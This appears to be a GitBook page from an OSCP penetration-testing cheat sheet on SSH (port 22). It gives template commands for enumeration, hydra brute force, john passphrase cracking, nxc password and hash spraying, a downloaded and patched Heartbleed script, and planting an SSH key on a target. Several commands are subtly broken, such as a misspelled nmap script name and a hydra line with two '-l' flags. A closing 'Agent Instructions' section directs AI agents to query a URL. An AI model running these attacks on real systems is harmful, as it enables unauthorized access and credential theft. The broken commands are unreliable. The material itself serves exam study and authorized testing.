# TCP: SSH - 22

## Connection

```bash
ssh <Username>@<Target IP Address> [-p <Port>]
```

```bash
ssh -i <ID_RSA File Name> [-p <Port>] <Username>@<Target IP Address>
```

> **NOTE: Make sure id\_rsa has permission of 400**
>
> ```bash
> chmod 400 <ID_RSA File Name>
> ```

## Enumeration

### Banner Grabbing

```bash
nc -vn <Target IP Address> 22
```

### Grab Cert

```bash
ssh-keygen -t rsa <Target IP Address> [-p <Port>]
```

### Vulnerability Scanning

```bash
ssh-audit -v <Target IP Address>
```

### Nmap

Default Nmap script for SSH

```bash
nmap -sC -p <Port> <Target IP Address>
```

Retrieve version

```bash
nmap -sV -p <Port> <Target IP Address>
```

Retrieve support algorithms

```bash
nmap --script ss2-enum-algos -p <Port> <Target IP Address>
```

Retrieve weak keys

```bash
nmap --script ssh-hostkey --script-args ssh_hostkey=full -p <Port> <Target IP Address>
```

Check authentication method

{% code overflow="wrap" %}

```bash
nmap --script ssh-auth-methods --script-args="ssh.user=root" -p <Port> <Target IP Address>
```

{% endcode %}

## Bruteforce

### Normal Password Bruteforce

```bash
hydra -L <Username List> -P <Password List> -s <Port> ssh://<Target IP Address>
```

```bash
hydra -l <Username> -l <Password> -s <Port> ssh://<Target IP Address>
```

### Passphrase Bruteforce

{% stepper %}
{% step %}

### Retrieve passphrase hash from id\_rsa

```bash
ssh2john id_rsa > ssh.hash
```

{% endstep %}

{% step %}

### Crack hash

```bash
john --wordlist=/usr/share/wordlists/rockyou.txt ssh.hash
```

{% endstep %}
{% endstepper %}

### Password Spraying

{% code overflow="wrap" %}

```bash
nxc ssh <Target IP Address> -u <Username Lists> -p <Password Lists> --continue-on-success
```

{% endcode %}

```bash
nxc ssh <Target IP Address> -u <Username Lists> -H <Hash Lists> --continue-on-success
```

## Exploit

### Heartbleed.py

Github Repo: <https://gist.github.com/eelsivart/10174134>

{% code overflow="wrap" %}

```bash
curl -O https://gist.githubusercontent.com/eelsivart/10174134/raw/8aea10b2f0f6842ccff97ee921a836cf05cd7530/heartbleed.py
```

{% endcode %}

Modify the following part

{% tabs %}
{% tab title="Before" %}

```python
def build_heartbeat(tls_ver):
    heartbeat = [
0x18,       # Content Type (Heartbeat)
0x03, tls_ver,  # TLS version
0x00, 0x03,  # Length
# Payload
0x01,       # Type (Request)
0x40, 0x00  # Payload length
    ] 
    return heartbeat
```

{% endtab %}

{% tab title="After" %}

```python
def build_heartbeat(tls_ver):
    heartbeat = [
0x18,       # Content Type (Heartbeat)
0x03, tls_ver,  # TLS version
0x00, 0x03,  # Length
# Payload
0x01,       # Type (Request)
0x10, 0x00  # Payload length
    ] 
    return heartbeat
```

{% endtab %}
{% endtabs %}

```bash
python heartbleed.py <Target IP Address>
```

To include Hexdump

```bash
python heartbleed.py -x <Target IP Address>
```

For repeated run

```bash
python heartbleed.py -n <Count> <Target OP Address>
```

### Fake user

{% stepper %}
{% step %}

### Generate id\_rsa

```bash
ssh-keygen -t rsa
```

{% endstep %}

{% step %}

### Copy the content of id\_rsa.pub and paste it in target machine

```bash
cat /home/kali/offsec/.ssh/id_rsa.pub
```

{% endstep %}
{% endstepper %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://yongjun04.gitbook.io/oscp-cheatsheet/methodology/service-enumeration/tcp-ssh-22.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.